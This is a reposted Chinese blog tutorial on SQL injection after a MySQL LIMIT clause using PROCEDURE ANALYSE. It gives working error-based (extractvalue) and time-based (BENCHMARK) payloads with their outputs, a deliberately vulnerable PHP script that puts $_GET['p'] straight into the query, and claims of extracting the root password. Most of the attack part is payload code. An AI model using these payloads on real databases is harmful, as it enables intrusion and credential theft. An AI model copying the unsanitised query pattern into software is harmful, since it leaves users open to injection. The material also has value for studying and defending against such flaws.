[转载]Mysql下Limit注入方法

admin

原文： https://rateip.com/blog/sql-injections-in-mysql-limit-clause/ http://zone.wooyun.org/content/18220

   此方法适用于Mysql 5.x中，在limit语句后面的注入

    例如：

1. SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT injection_point
   

复制代码

上面的语句包含了ORDER BY，MySQL当中UNION语句不能在ORDER BY的后面，否则利用UNION很容易就可以读取数据了，看看在MySQL 5中的SELECT语法：

1. SELECT
   
2.     [ALL | DISTINCT | DISTINCTROW ]
   
3.       [HIGH_PRIORITY]
   
4.       [STRAIGHT_JOIN]
   
5.       [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]
   
6.       [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]
   
7.     select_expr [, select_expr ...]
   
8.     [FROM table_references
   
9.     [WHERE where_condition]
   
10.     [GROUP BY {col_name | expr | position}
    
11.       [ASC | DESC], ... [WITH ROLLUP]]
    
12.     [HAVING where_condition]
    
13.     [ORDER BY {col_name | expr | position}
    
14.       [ASC | DESC], ...]
    
15.     [LIMIT {[offset,] row_count | row_count OFFSET offset}]
    
16.     [PROCEDURE procedure_name(argument_list)]
    
17.     [INTO OUTFILE 'file_name' export_options
    
18.       | INTO DUMPFILE 'file_name'
    
19.       | INTO var_name [, var_name]]
    
20.     [FOR UPDATE | LOCK IN SHARE MODE]]

复制代码

  在LIMIT后面可以跟两个函数，PROCEDURE 和 INTO，INTO除非有写入shell的权限，否则是无法利用的，那么使用PROCEDURE函数能否注入呢？ Let’s give it a try:

1. mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1);
   
2. 
   
3. ERROR 1386 (HY000): Can't use ORDER clause with this procedure

复制代码

  ANALYSE可以有两个参数：

1. mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1,1);
   
2. 
   
3. ERROR 1386 (HY000): Can't use ORDER clause with this procedure

复制代码

看起来并不是很好，继续尝试：

1. mysql> SELECT field from table where id > 0 order by id LIMIT 1,1 procedure analyse((select IF(MID(version(),1,1) LIKE 5, sleep(5),1)),1);
   

复制代码

    但是立即返回了一个错误信息：

1. ERROR 1108 (HY000): Incorrect parameters to procedure 'analyse'
   

复制代码

    sleep函数肯定没有执行，但是最终我还是找到了可以攻击的方式：

1. mysql> SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
   
2. 
   
3. ERROR 1105 (HY000): XPATH syntax error: ':5.5.41-0ubuntu0.14.04.1'

复制代码

    如果不支持报错注入的话，还可以基于时间注入：

1. SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)

复制代码

直接使用sleep不行，需要用BENCHMARK代替。

我亲测好用~这里附上我的测试代码：

1. <?php
   
2. header("Content-Type: text/plain; charset=utf-8");
   
3. require("mysql.class.php");
   
4. $mysql = new MySQL("test", "root", "root");
   
5. 
   
6. $users = $mysql->executeSQL("SELECT * FROM user where uid < 100 ORDER BY uid limit {$_GET['p']}, 10");
   
7. if($users){
   
8. $users = var_export($users, TRUE);
   
9. echo $users;
   
10. }else{
    
11.         echo $mysql->lastError;
    
12. }

复制代码

报错注入获得root密码：

   

    报错注入获得mysql用户：

   

from:https://www.leavesongs.com/PENET ... l-limit-clause.html